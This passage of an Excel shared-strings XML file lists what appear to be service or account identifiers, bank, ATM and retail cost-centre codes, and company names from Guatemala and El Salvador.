    <t>F4614230</t>
  </si>
  <si>
    <t>F4614233</t>
  </si>
  <si>
    <t>F4614240</t>
  </si>
  <si>
    <t>F4614242</t>
  </si>
  <si>
    <t>F4614243</t>
  </si>
  <si>
    <t>F4614252</t>
  </si>
  <si>
    <t>F4614255</t>
  </si>
  <si>
    <t>F4614259</t>
  </si>
  <si>
    <t>F4614263</t>
  </si>
  <si>
    <t>F4614270</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_ANTIGUA</t>
  </si>
  <si>
    <t>F4614278</t>
  </si>
  <si>
    <t>F4614281</t>
  </si>
  <si>
    <t>F4614284</t>
  </si>
  <si>
    <t>F4614288</t>
  </si>
  <si>
    <t>F4614294</t>
  </si>
  <si>
    <t>IP2165220SV</t>
  </si>
  <si>
    <t>1664621OH</t>
  </si>
  <si>
    <t>IP2036034SV</t>
  </si>
  <si>
    <t>F4567555</t>
  </si>
  <si>
    <t>F4567556</t>
  </si>
  <si>
    <t>F4567559</t>
  </si>
  <si>
    <t>F4567561</t>
  </si>
  <si>
    <t>343100059T</t>
  </si>
  <si>
    <t>F4567566</t>
  </si>
  <si>
    <t>F4567571</t>
  </si>
  <si>
    <t>90001907988T</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3936</t>
  </si>
  <si>
    <t>F4567588</t>
  </si>
  <si>
    <t>F4567589</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_1094</t>
  </si>
  <si>
    <t>ID1024167SV</t>
  </si>
  <si>
    <t>F4567593</t>
  </si>
  <si>
    <t>F4567596</t>
  </si>
  <si>
    <t>F4567597</t>
  </si>
  <si>
    <t>F4567600</t>
  </si>
  <si>
    <t>333600013T</t>
  </si>
  <si>
    <t>F4567604</t>
  </si>
  <si>
    <t>F4567605</t>
  </si>
  <si>
    <t>F4567609</t>
  </si>
  <si>
    <t>3774142ON</t>
  </si>
  <si>
    <t>5199850ON</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3052</t>
  </si>
  <si>
    <t>F4567623</t>
  </si>
  <si>
    <t>F4567625</t>
  </si>
  <si>
    <t>F4567628</t>
  </si>
  <si>
    <t>F4567632</t>
  </si>
  <si>
    <t>629100028T</t>
  </si>
  <si>
    <t>ID1142020SV</t>
  </si>
  <si>
    <t>INVERSIONES NUEVA ERA SA DE CV</t>
  </si>
  <si>
    <t>F4567648</t>
  </si>
  <si>
    <t>F4567649</t>
  </si>
  <si>
    <t>5237142ON</t>
  </si>
  <si>
    <t>227658ON</t>
  </si>
  <si>
    <t>F4567662</t>
  </si>
  <si>
    <t>F4567665</t>
  </si>
  <si>
    <t>F4567668</t>
  </si>
  <si>
    <t>F4567681</t>
  </si>
  <si>
    <t>IP2101017SV</t>
  </si>
  <si>
    <t>F4567683</t>
  </si>
  <si>
    <t>727100044T</t>
  </si>
  <si>
    <t>5119729ON</t>
  </si>
  <si>
    <t>ON0002677439</t>
  </si>
  <si>
    <t>758500455T</t>
  </si>
  <si>
    <t>21500005T</t>
  </si>
  <si>
    <t>F4551840</t>
  </si>
  <si>
    <t>F4551858</t>
  </si>
  <si>
    <t>F4551862</t>
  </si>
  <si>
    <t>F4551872</t>
  </si>
  <si>
    <t>F4551873</t>
  </si>
  <si>
    <t>F4551874</t>
  </si>
  <si>
    <t>F4551889</t>
  </si>
  <si>
    <t>F4551894</t>
  </si>
  <si>
    <t>245700092T</t>
  </si>
  <si>
    <t>852200001T</t>
  </si>
  <si>
    <t>WATER SYSTEM MANAGEMENT, S.A.</t>
  </si>
  <si>
    <t>F4551909</t>
  </si>
  <si>
    <t>672700005T</t>
  </si>
  <si>
    <t>F4551938</t>
  </si>
  <si>
    <t>ID1126058SV</t>
  </si>
  <si>
    <t>MONELCA, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4616849</t>
  </si>
  <si>
    <t>F4616859</t>
  </si>
  <si>
    <t>886300002T</t>
  </si>
  <si>
    <t>F4616902</t>
  </si>
  <si>
    <t>CC_PRONE_GT_SUPER_24_CHIMALTENANGO</t>
  </si>
  <si>
    <t>354700016T</t>
  </si>
  <si>
    <t>F4616929</t>
  </si>
  <si>
    <t>F4616930</t>
  </si>
  <si>
    <t>F4616934</t>
  </si>
  <si>
    <t>1733342OH</t>
  </si>
  <si>
    <t>F4616936</t>
  </si>
  <si>
    <t>354500013T</t>
  </si>
  <si>
    <t>F4616951</t>
  </si>
  <si>
    <t>F4616969</t>
  </si>
  <si>
    <t>F4616980</t>
  </si>
  <si>
    <t>F4571740</t>
  </si>
  <si>
    <t>F4571742</t>
  </si>
  <si>
    <t>F4571761</t>
  </si>
  <si>
    <t>F4571764</t>
  </si>
  <si>
    <t>F4571770</t>
  </si>
  <si>
    <t>F4571772</t>
  </si>
  <si>
    <t>F4571775</t>
  </si>
  <si>
    <t>F4571778</t>
  </si>
  <si>
    <t>F4571781</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_27</t>
  </si>
  <si>
    <t>F4571786</t>
  </si>
  <si>
    <t>F4571790</t>
  </si>
  <si>
    <t>F4571793</t>
  </si>
  <si>
    <t>F4571796</t>
  </si>
  <si>
    <t>F4571808</t>
  </si>
  <si>
    <t>F4571812</t>
  </si>
  <si>
    <t>F4571821</t>
  </si>
  <si>
    <t>601100009T</t>
  </si>
  <si>
    <t>IP2029224SV</t>
  </si>
  <si>
    <t>F4571831</t>
  </si>
  <si>
    <t>22312100SV</t>
  </si>
  <si>
    <t>F4571839</t>
  </si>
  <si>
    <t>F4571844</t>
  </si>
  <si>
    <t>F4571847</t>
  </si>
  <si>
    <t>F4571848</t>
  </si>
  <si>
    <t>F4571849</t>
  </si>
  <si>
    <t>F4571867</t>
  </si>
  <si>
    <t>F4571878</t>
  </si>
  <si>
    <t>863400140T</t>
  </si>
  <si>
    <t>F4530828</t>
  </si>
  <si>
    <t>F4554591</t>
  </si>
  <si>
    <t>F4554592</t>
  </si>
  <si>
    <t>F4554595</t>
  </si>
  <si>
    <t>F4554611</t>
  </si>
  <si>
    <t>F4554632</t>
  </si>
  <si>
    <t>F4554637</t>
  </si>
  <si>
    <t>F4554638</t>
  </si>
  <si>
    <t>F4554651</t>
  </si>
  <si>
    <t>62900070T</t>
  </si>
  <si>
    <t>F4554653</t>
  </si>
  <si>
    <t>F4554658</t>
  </si>
  <si>
    <t>F4554659</t>
  </si>
  <si>
    <t>61200242T</t>
  </si>
  <si>
    <t>F4554671</t>
  </si>
  <si>
    <t>F4554684</t>
  </si>
  <si>
    <t>F4554691</t>
  </si>
  <si>
    <t>F4554692</t>
  </si>
  <si>
    <t>F4554693</t>
  </si>
  <si>
    <t>F4554694</t>
  </si>
  <si>
    <t>562100001T</t>
  </si>
  <si>
    <t>SELINA OPERATION ANTIGUA, SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>F4554733</t>
  </si>
  <si>
    <t>F4554744</t>
  </si>
  <si>
    <t>F4623483</t>
  </si>
  <si>
    <t>F4623485</t>
  </si>
  <si>
    <t>F4623487</t>
  </si>
  <si>
    <t>F4623496</t>
  </si>
  <si>
    <t>361700045T</t>
  </si>
  <si>
    <t>F4623505</t>
  </si>
  <si>
    <t>1616197</t>
  </si>
  <si>
    <t>357500013T</t>
  </si>
  <si>
    <t>90001801135T</t>
  </si>
  <si>
    <t>F4623557</t>
  </si>
  <si>
    <t>F4623558</t>
  </si>
  <si>
    <t>F4623569</t>
  </si>
  <si>
    <t>CONTR0001831398OC</t>
  </si>
  <si>
    <t>F4623579</t>
  </si>
  <si>
    <t>F4623591</t>
  </si>
  <si>
    <t>F4623596</t>
  </si>
  <si>
    <t>945200001T</t>
  </si>
  <si>
    <t>TECNOCOMPU</t>
  </si>
  <si>
    <t>F4623618</t>
  </si>
  <si>
    <t>ID1038274SV</t>
  </si>
  <si>
    <t>SERVICIOS INTEGRALES DE ALIMENTOS, SOCIEDAD ANONIMA DE CAPITAL</t>
  </si>
  <si>
    <t>340500002T</t>
  </si>
  <si>
    <t>825300013T</t>
  </si>
  <si>
    <t>F4578187</t>
  </si>
  <si>
    <t>910400083T</t>
  </si>
  <si>
    <t>879664OH</t>
  </si>
  <si>
    <t>F4578203</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_510</t>
  </si>
  <si>
    <t>F4578216</t>
  </si>
  <si>
    <t>F4578217</t>
  </si>
  <si>
    <t>IP2038248SV</t>
  </si>
  <si>
    <t>90001906084T</t>
  </si>
  <si>
    <t>F4578233</t>
  </si>
  <si>
    <t>F4578237</t>
  </si>
  <si>
    <t>621300018T</t>
  </si>
  <si>
    <t>DARWIN MEFIBOSET ALARCON CALDERON</t>
  </si>
  <si>
    <t>F4578241</t>
  </si>
  <si>
    <t>25052600SV</t>
  </si>
  <si>
    <t>STEINER S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4578250</t>
  </si>
  <si>
    <t>23893600SV</t>
  </si>
  <si>
    <t>F4578259</t>
  </si>
  <si>
    <t>622700014T</t>
  </si>
  <si>
    <t>670700003T</t>
  </si>
  <si>
    <t>22134100SV</t>
  </si>
  <si>
    <t>K &amp; V S.A DE C.V</t>
  </si>
  <si>
    <t>660600005T</t>
  </si>
  <si>
    <t>24206100SV</t>
  </si>
  <si>
    <t>IP2025150SV</t>
  </si>
  <si>
    <t>343100052T</t>
  </si>
  <si>
    <t>622700044T</t>
  </si>
  <si>
    <t>F4578287</t>
  </si>
  <si>
    <t>F4578293</t>
  </si>
  <si>
    <t>F4578299</t>
  </si>
  <si>
    <t>1307078OH</t>
  </si>
  <si>
    <t>TELECAPE</t>
  </si>
  <si>
    <t>343100004T</t>
  </si>
  <si>
    <t>F4578303</t>
  </si>
  <si>
    <t>25256700SV</t>
  </si>
  <si>
    <t>INDUSTRIAL COLOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4578306</t>
  </si>
  <si>
    <t>622700012T</t>
  </si>
  <si>
    <t>F4578325</t>
  </si>
  <si>
    <t>622700025T</t>
  </si>
  <si>
    <t>23474500SV</t>
  </si>
  <si>
    <t>20538190</t>
  </si>
  <si>
    <t>F4557735</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4228</t>
  </si>
  <si>
    <t>F4557782</t>
  </si>
  <si>
    <t>F4557783</t>
  </si>
  <si>
    <t>F4557784</t>
  </si>
  <si>
    <t>F4557794</t>
  </si>
  <si>
    <t>F4557803</t>
  </si>
  <si>
    <t>F4557817</t>
  </si>
  <si>
    <t>F4582501</t>
  </si>
  <si>
    <t>F4582509</t>
  </si>
  <si>
    <t>F4582514</t>
  </si>
  <si>
    <t>F4582515</t>
  </si>
  <si>
    <t>F4582534</t>
  </si>
  <si>
    <t>F4582546</t>
  </si>
  <si>
    <t>F4582566</t>
  </si>
  <si>
    <t>CC_WALMART_UTILITARIOS_GT_0752</t>
  </si>
  <si>
    <t>F4582572</t>
  </si>
  <si>
    <t>F4582574</t>
  </si>
  <si>
    <t>F4582579</t>
  </si>
  <si>
    <t>F4582592</t>
  </si>
  <si>
    <t>F4582593</t>
  </si>
  <si>
    <t>F4582597</t>
  </si>
  <si>
    <t>F4582599</t>
  </si>
  <si>
    <t>F4582604</t>
  </si>
  <si>
    <t>F4582606</t>
  </si>
  <si>
    <t>F4582607</t>
  </si>
  <si>
    <t>F4582608</t>
  </si>
  <si>
    <t>F4582610</t>
  </si>
  <si>
    <t>F4582613</t>
  </si>
  <si>
    <t>F4582618</t>
  </si>
  <si>
    <t>F4582627</t>
  </si>
  <si>
    <t>F4582632</t>
  </si>
  <si>
    <t>F4582638</t>
  </si>
  <si>
    <t>F4582641</t>
  </si>
  <si>
    <t>F4582645</t>
  </si>
  <si>
    <t>F4582653</t>
  </si>
  <si>
    <t>ID1068003SV</t>
  </si>
  <si>
    <t>ID1145197SV</t>
  </si>
  <si>
    <t>EPOCACI SA DE CV</t>
  </si>
  <si>
    <t>F4562160</t>
  </si>
  <si>
    <t>F4562163</t>
  </si>
  <si>
    <t>551673OH</t>
  </si>
  <si>
    <t>F4562183</t>
  </si>
  <si>
    <t>F4562184</t>
  </si>
  <si>
    <t>F4562185</t>
  </si>
  <si>
    <t>967764OH</t>
  </si>
  <si>
    <t>F4562198</t>
  </si>
  <si>
    <t>F4562199</t>
  </si>
  <si>
    <t>F4562219</t>
  </si>
  <si>
    <t>F4562228</t>
  </si>
  <si>
    <t>F4562235</t>
  </si>
  <si>
    <t>F4562241</t>
  </si>
  <si>
    <t>F4562284</t>
  </si>
  <si>
    <t>F4562288</t>
  </si>
  <si>
    <t>F4558220</t>
  </si>
  <si>
    <t>F4558222</t>
  </si>
  <si>
    <t>675300001T</t>
  </si>
  <si>
    <t>COMPANIA DE PROCESAMIENTO DE PAGOS DE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4558239</t>
  </si>
  <si>
    <t>BANCO DE ANTIGUA S.A (XT)</t>
  </si>
  <si>
    <t>8900484T</t>
  </si>
  <si>
    <t>40300083T</t>
  </si>
  <si>
    <t>F4558262</t>
  </si>
  <si>
    <t>F4558264</t>
  </si>
  <si>
    <t>807900445T</t>
  </si>
  <si>
    <t>F4558270</t>
  </si>
  <si>
    <t>F4558294</t>
  </si>
  <si>
    <t>F4558299</t>
  </si>
  <si>
    <t>F4558300</t>
  </si>
  <si>
    <t>F4558321</t>
  </si>
  <si>
    <t>F4558327</t>
  </si>
  <si>
    <t>F4558349</t>
  </si>
  <si>
    <t>F4558352</t>
  </si>
  <si>
    <t>F4558358</t>
  </si>
  <si>
    <t>F4558359</t>
  </si>
  <si>
    <t>F4558361</t>
  </si>
  <si>
    <t>895329OH</t>
  </si>
  <si>
    <t>F4558376</t>
  </si>
  <si>
    <t>937783OH</t>
  </si>
  <si>
    <t>1386212OH</t>
  </si>
  <si>
    <t>F4558379</t>
  </si>
  <si>
    <t>938160OH</t>
  </si>
  <si>
    <t>942700002T</t>
  </si>
  <si>
    <t>F4590291</t>
  </si>
  <si>
    <t>F4590315</t>
  </si>
  <si>
    <t>F4590320</t>
  </si>
  <si>
    <t>F4590325</t>
  </si>
  <si>
    <t>F4590332</t>
  </si>
  <si>
    <t>F4590336</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC_007823</t>
  </si>
  <si>
    <t>F4590362</t>
  </si>
  <si>
    <t>F4590372</t>
  </si>
  <si>
    <t>F4590381</t>
  </si>
  <si>
    <t>F4566439</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_SANTA_ANA</t>
  </si>
  <si>
    <t>4986986ON</t>
  </si>
  <si>
    <t>21216900SV</t>
  </si>
  <si>
    <t>TOP CARE,S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4566474</t>
  </si>
  <si>
    <t>F4566476</t>
  </si>
  <si>
    <t>F4566493</t>
  </si>
  <si>
    <t>F4566494</t>
  </si>
  <si>
    <t>F4566496</t>
  </si>
  <si>
    <t>F4566509</t>
  </si>
  <si>
    <t>F4566513</t>
  </si>
  <si>
    <t>F4566517</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM4460</t>
  </si>
  <si>
    <t>F4566521</t>
  </si>
  <si>
    <t>F4566529</t>
  </si>
  <si>
    <t>1723138OH</t>
  </si>
  <si>
    <t>OH1001077453</t>
  </si>
  <si>
    <t>F4566575</t>
  </si>
  <si>
    <t>343100062T</t>
  </si>
  <si>
    <t>F4566591</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3265</t>
  </si>
  <si>
    <t>F4566592</t>
  </si>
  <si>
    <t>F4566593</t>
  </si>
  <si>
    <t>CC_UNICOMER_GT_INTERNET_CC_PRADERA_CHIMALTENANGO</t>
  </si>
  <si>
    <t>F4566596</t>
  </si>
  <si>
    <t>F4558380</t>
  </si>
  <si>
    <t>F4558391</t>
  </si>
  <si>
    <t>F4558394</t>
  </si>
  <si>
    <t>485000001T</t>
  </si>
  <si>
    <t>SISTEMAS LOGISTICOS PORTUARIOS</t>
  </si>
  <si>
    <t>894300002T</t>
  </si>
  <si>
    <t>F4558442</t>
  </si>
  <si>
    <t>F4558449</t>
  </si>
  <si>
    <t>947900002T</t>
  </si>
  <si>
    <t>F4558454</t>
  </si>
  <si>
    <t>F4558455</t>
  </si>
  <si>
    <t>IP2148059SV</t>
  </si>
  <si>
    <t>5261693ON</t>
  </si>
  <si>
    <t>F4558461</t>
  </si>
  <si>
    <t>284500031T</t>
  </si>
  <si>
    <t>F4558476</t>
  </si>
  <si>
    <t>90001801421T</t>
  </si>
  <si>
    <t>927700016T</t>
  </si>
  <si>
    <t>F4558494</t>
  </si>
  <si>
    <t>42700373T</t>
  </si>
  <si>
    <t>F4558505</t>
  </si>
  <si>
    <t>39300049T</t>
  </si>
  <si>
    <t>F4558514</t>
  </si>
  <si>
    <t>F4558519</t>
  </si>
  <si>
    <t>F4558521</t>
  </si>
  <si>
    <t>F4558522</t>
  </si>
  <si>
    <t>F4558526</t>
  </si>
  <si>
    <t>F4558529</t>
  </si>
  <si>
    <t>F4568152</t>
  </si>
  <si>
    <t>8000035T</t>
  </si>
  <si>
    <t>F4568154</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_145</t>
  </si>
  <si>
    <t>F4568185</t>
  </si>
  <si>
    <t>F4568191</t>
  </si>
  <si>
    <t>F4568196</t>
  </si>
  <si>
    <t>IP2051007SV</t>
  </si>
  <si>
    <t>F4568199</t>
  </si>
  <si>
    <t>F4568201</t>
  </si>
  <si>
    <t>F4568205</t>
  </si>
  <si>
    <t>F4568206</t>
  </si>
  <si>
    <t>F4568207</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2832</t>
  </si>
  <si>
    <t>F4568294</t>
  </si>
  <si>
    <t>F4546777</t>
  </si>
  <si>
    <t>F4546781</t>
  </si>
  <si>
    <t>F4546782</t>
  </si>
  <si>
    <t>F4546786</t>
  </si>
  <si>
    <t>23471200SV</t>
  </si>
  <si>
    <t>HOSPITAL SANTA TERESA</t>
  </si>
  <si>
    <t>F4546794</t>
  </si>
  <si>
    <t>F4546807</t>
  </si>
  <si>
    <t>F4546815</t>
  </si>
  <si>
    <t>F4546822</t>
  </si>
  <si>
    <t>F4546830</t>
  </si>
  <si>
    <t>F4546834</t>
  </si>
  <si>
    <t>F4546835</t>
  </si>
  <si>
    <t>F4546836</t>
  </si>
  <si>
    <t>F4546839</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM3743</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_4178</t>
  </si>
  <si>
    <t>F4546852</t>
  </si>
  <si>
    <t>F4546853</t>
  </si>
  <si>
    <t>F4546860</t>
  </si>
  <si>
    <t>313900377T</t>
  </si>
  <si>
    <t>292900231T</t>
  </si>
  <si>
    <t>F4546874</t>
  </si>
  <si>
    <t>796000003T</t>
  </si>
  <si>
    <t>SMART COMUNICACIONES, S. A.</t>
  </si>
  <si>
    <t>F4546882</t>
  </si>
  <si>
    <t>F4546912</t>
  </si>
  <si>
    <t>F4559056</t>
  </si>
  <si>
    <t>F4540668</t>
  </si>
  <si>
    <t>F4547615</t>
  </si>
  <si>
    <t>F4547616</t>
  </si>
  <si>
    <t>F4547620</t>
  </si>
  <si>
    <t>F4547622</t>
  </si>
  <si>
    <t>F4547627</t>
  </si>
  <si>
    <t>F4547629</t>
  </si>
  <si>
    <t>F4547630</t>
  </si>
  <si>
    <t>4388622ON</t>
  </si>
  <si>
    <t>ON0002096176/MATERIALES EL HALCON/JUAN ALBERTO CAJINA MALTEZ</t>
  </si>
  <si>
    <t>F4547632</t>
  </si>
  <si>
    <t>F4547639</t>
  </si>
  <si>
    <t>22979100SV</t>
  </si>
  <si>
    <t>370100001T</t>
  </si>
  <si>
    <t>TRANSPORTE EMPAQUE Y ALMACENAJE</t>
  </si>
  <si>
    <t>F4547648</t>
  </si>
  <si>
    <t>F4547661</t>
  </si>
  <si>
    <t>F4547662</t>
  </si>
  <si>
    <t>774800006T</t>
  </si>
  <si>
    <t>PRICESMART (GUATEMALA), SOCIEDAD ANONIMA</t>
  </si>
  <si>
    <t>25345500SV</t>
  </si>
  <si>
    <t>TROLEX S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4547688</t>
  </si>
  <si>
    <t>F4547689</t>
  </si>
  <si>
    <t>90001909635T</t>
  </si>
  <si>
    <t>IDG000537SV</t>
  </si>
  <si>
    <t>FRANQUICIAS DE CENTROAMERICA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4547692</t>
  </si>
  <si>
    <t>F4547696</t>
  </si>
  <si>
    <t>F4547697</t>
  </si>
  <si>
    <t>25250000SV</t>
  </si>
  <si>
    <t>PIER 17 DE EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4547703</t>
  </si>
  <si>
    <t>F4547704</t>
  </si>
  <si>
    <t>F4547705</t>
  </si>
  <si>
    <t>F4547706</t>
  </si>
  <si>
    <t>F4547707</t>
  </si>
  <si>
    <t>F4547709</t>
  </si>
  <si>
    <t>F4547715</t>
  </si>
  <si>
    <t>F4547716</t>
  </si>
  <si>
    <t>F4547719</t>
  </si>
  <si>
    <t>F4547728</t>
  </si>
  <si>
    <t>3832674ON</t>
  </si>
  <si>
    <t>F4547737</t>
  </si>
  <si>
    <t>22418600SV</t>
  </si>
  <si>
    <t>F4547745</t>
  </si>
  <si>
    <t>22518480SV</t>
  </si>
  <si>
    <t>ELECTRONIC SYSTEMS SA DE CV</t>
  </si>
  <si>
    <t>CC_CREDOMATIC_GT_INTERNET_AGENCIA_0108</t>
  </si>
  <si>
    <t>90001902517T</t>
  </si>
  <si>
    <t>F4561471</t>
  </si>
  <si>
    <t>F4561473</t>
  </si>
  <si>
    <t>F4561475</t>
  </si>
  <si>
    <t>F4561476</t>
  </si>
  <si>
    <t>F4561484</t>
  </si>
  <si>
    <t>F4561492</t>
  </si>
  <si>
    <t>F4561493</t>
  </si>
  <si>
    <t>485500001T</t>
  </si>
  <si>
    <t>DESARROLLOS LAS UVITAS S.A.</t>
  </si>
  <si>
    <t>F4561498</t>
  </si>
  <si>
    <t>F4561500</t>
  </si>
  <si>
    <t>F4561507</t>
  </si>
  <si>
    <t>F4561516</t>
  </si>
  <si>
    <t>313900302T</t>
  </si>
  <si>
    <t>IP2145302SV</t>
  </si>
  <si>
    <t>IP2038464SV</t>
  </si>
  <si>
    <t>F4561531</t>
  </si>
  <si>
    <t>F4561533</t>
  </si>
  <si>
    <t>F4561540</t>
  </si>
  <si>
    <t>F4561544</t>
  </si>
  <si>
    <t>22090400SV</t>
  </si>
  <si>
    <t>INFRASAL S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4561557</t>
  </si>
  <si>
    <t>90001911333T</t>
  </si>
  <si>
    <t>F4561568</t>
  </si>
  <si>
    <t>F4561569</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0861</t>
  </si>
  <si>
    <t>F4561572</t>
  </si>
  <si>
    <t>8900576T</t>
  </si>
  <si>
    <t>F4561579</t>
  </si>
  <si>
    <t>3775137ON</t>
  </si>
  <si>
    <t>F4561597</t>
  </si>
  <si>
    <t>F4561609</t>
  </si>
  <si>
    <t>F4568616</t>
  </si>
  <si>
    <t>F4560862</t>
  </si>
  <si>
    <t>F4560874</t>
  </si>
  <si>
    <t>919496OH</t>
  </si>
  <si>
    <t>OH1000760078/AEROPUERTO TONCONTIN CANJE PUBLICIDAD -</t>
  </si>
  <si>
    <t>254100011T</t>
  </si>
  <si>
    <t>IP2172017SV</t>
  </si>
  <si>
    <t>F4560967</t>
  </si>
  <si>
    <t>F4560997</t>
  </si>
  <si>
    <t>F4561004</t>
  </si>
  <si>
    <t>F4561005</t>
  </si>
  <si>
    <t>F4561008</t>
  </si>
  <si>
    <t>749975OH</t>
  </si>
  <si>
    <t>F4566778</t>
  </si>
  <si>
    <t>F4566780</t>
  </si>
  <si>
    <t>F4566785</t>
  </si>
  <si>
    <t>F4566789</t>
  </si>
  <si>
    <t>F4566795</t>
  </si>
  <si>
    <t>F4566796</t>
  </si>
  <si>
    <t>F4566823</t>
  </si>
  <si>
    <t>F4566829</t>
  </si>
  <si>
    <t>863400017T</t>
  </si>
  <si>
    <t>F4566841</t>
  </si>
  <si>
    <t>IP2245018SV</t>
  </si>
  <si>
    <t>F4566852</t>
  </si>
  <si>
    <t>F4566863</t>
  </si>
  <si>
    <t>F4566870</t>
  </si>
  <si>
    <t>F4566871</t>
  </si>
  <si>
    <t>F4566889</t>
  </si>
  <si>
    <t>F4543681</t>
  </si>
  <si>
    <t>F4568895</t>
  </si>
  <si>
    <t>F4568901</t>
  </si>
  <si>
    <t>22313600SV</t>
  </si>
  <si>
    <t>LAB. PAILL DIV. DE GRUPO PAILL S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4568921</t>
  </si>
  <si>
    <t>F4568925</t>
  </si>
  <si>
    <t>F4568931</t>
  </si>
  <si>
    <t>F4568935</t>
  </si>
  <si>
    <t>F4568936</t>
  </si>
  <si>
    <t>F4568943</t>
  </si>
  <si>
    <t>MP262107026SSV</t>
  </si>
  <si>
    <t>F4568965</t>
  </si>
  <si>
    <t>F4568970</t>
  </si>
  <si>
    <t>MP262122011SSV</t>
  </si>
  <si>
    <t>F4568985</t>
  </si>
  <si>
    <t>F4569005</t>
  </si>
  <si>
    <t>F4569013</t>
  </si>
  <si>
    <t>F4569018</t>
  </si>
  <si>
    <t>CC_WALMART_SV_DF_ZACATECOLUCA</t>
  </si>
  <si>
    <t>F4563875</t>
  </si>
  <si>
    <t>F4563890</t>
  </si>
  <si>
    <t>F4563893</t>
  </si>
  <si>
    <t>8600164T</t>
  </si>
  <si>
    <t>F4563907</t>
  </si>
  <si>
    <t>F4563920</t>
  </si>
  <si>
    <t>8902507T</t>
  </si>
  <si>
    <t>F4563923</t>
  </si>
  <si>
    <t>F4563929</t>
  </si>
  <si>
    <t>F4563931</t>
  </si>
  <si>
    <t>F4563936</t>
  </si>
  <si>
    <t>F4563946</t>
  </si>
  <si>
    <t>F4563953</t>
  </si>
  <si>
    <t>F4563958</t>
  </si>
  <si>
    <t>F4563960</t>
  </si>
  <si>
    <t>F4563976</t>
  </si>
  <si>
    <t>F4563978</t>
  </si>
  <si>
    <t>F4563993</t>
  </si>
  <si>
    <t>F4563995</t>
  </si>
  <si>
    <t>F4564007</t>
  </si>
  <si>
    <t>F4564008</t>
  </si>
  <si>
    <t>F4564009</t>
  </si>
  <si>
    <t>F4564026</t>
  </si>
  <si>
    <t>F4567255</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC004173</t>
  </si>
  <si>
    <t>F4567259</t>
  </si>
  <si>
    <t>F4567260</t>
  </si>
  <si>
    <t>F4567269</t>
  </si>
  <si>
    <t>F4567270</t>
  </si>
  <si>
    <t>F4567274</t>
  </si>
  <si>
    <t>F4567280</t>
  </si>
  <si>
    <t>F4567285</t>
  </si>
  <si>
    <t>90001910140T</t>
  </si>
  <si>
    <t>90001903002T</t>
  </si>
  <si>
    <t>F4567297</t>
  </si>
  <si>
    <t>IP2045087SV</t>
  </si>
  <si>
    <t>F4567319</t>
  </si>
  <si>
    <t>F4567328</t>
  </si>
  <si>
    <t>F4567335</t>
  </si>
  <si>
    <t>F4567336</t>
  </si>
  <si>
    <t>F4567341</t>
  </si>
  <si>
    <t>406400062T</t>
  </si>
  <si>
    <t>F4567349</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM5094</t>
  </si>
  <si>
    <t>99900424T</t>
  </si>
  <si>
    <t>340500006T</t>
  </si>
  <si>
    <t>88600027T</t>
  </si>
  <si>
    <t>F4567360</t>
  </si>
  <si>
    <t>F4567365</t>
  </si>
  <si>
    <t>F4567368</t>
  </si>
  <si>
    <t>916000017T</t>
  </si>
  <si>
    <t>90001903805T</t>
  </si>
  <si>
    <t>F4567378</t>
  </si>
  <si>
    <t>F4567389</t>
  </si>
  <si>
    <t>97100210T</t>
  </si>
  <si>
    <t>F4567393</t>
  </si>
  <si>
    <t>90001906309T</t>
  </si>
  <si>
    <t>896465OH</t>
  </si>
  <si>
    <t>22013900SV</t>
  </si>
  <si>
    <t>F4569093</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_1008</t>
  </si>
  <si>
    <t>F4569100</t>
  </si>
  <si>
    <t>F4569105</t>
  </si>
  <si>
    <t>F4569111</t>
  </si>
  <si>
    <t>F4569121</t>
  </si>
  <si>
    <t>208200055T</t>
  </si>
  <si>
    <t>F4569136</t>
  </si>
  <si>
    <t>F4569144</t>
  </si>
  <si>
    <t>F4569148</t>
  </si>
  <si>
    <t>F4569151</t>
  </si>
  <si>
    <t>F4569153</t>
  </si>
  <si>
    <t>F4569155</t>
  </si>
  <si>
    <t>IP2031258SV</t>
  </si>
  <si>
    <t>F4569169</t>
  </si>
  <si>
    <t>ID1029456SV</t>
  </si>
  <si>
    <t>F4569173</t>
  </si>
  <si>
    <t>F4569213</t>
  </si>
  <si>
    <t>F4564991</t>
  </si>
  <si>
    <t>F4564992</t>
  </si>
  <si>
    <t>F4564995</t>
  </si>
  <si>
    <t>F4564998</t>
  </si>
  <si>
    <t>F4565002</t>
  </si>
  <si>
    <t>F4565013</t>
  </si>
  <si>
    <t>623000001T</t>
  </si>
  <si>
    <t>CARIBEX WORLWIDE GUATEMALA, S.A.</t>
  </si>
  <si>
    <t>F4565021</t>
  </si>
  <si>
    <t>F4565033</t>
  </si>
  <si>
    <t>F4565035</t>
  </si>
  <si>
    <t>F4565043</t>
  </si>
  <si>
    <t>F4565058</t>
  </si>
  <si>
    <t>F4565065</t>
  </si>
  <si>
    <t>F4565067</t>
  </si>
  <si>
    <t>F4565068</t>
  </si>
  <si>
    <t>F4565072</t>
  </si>
  <si>
    <t>F4565073</t>
  </si>
  <si>
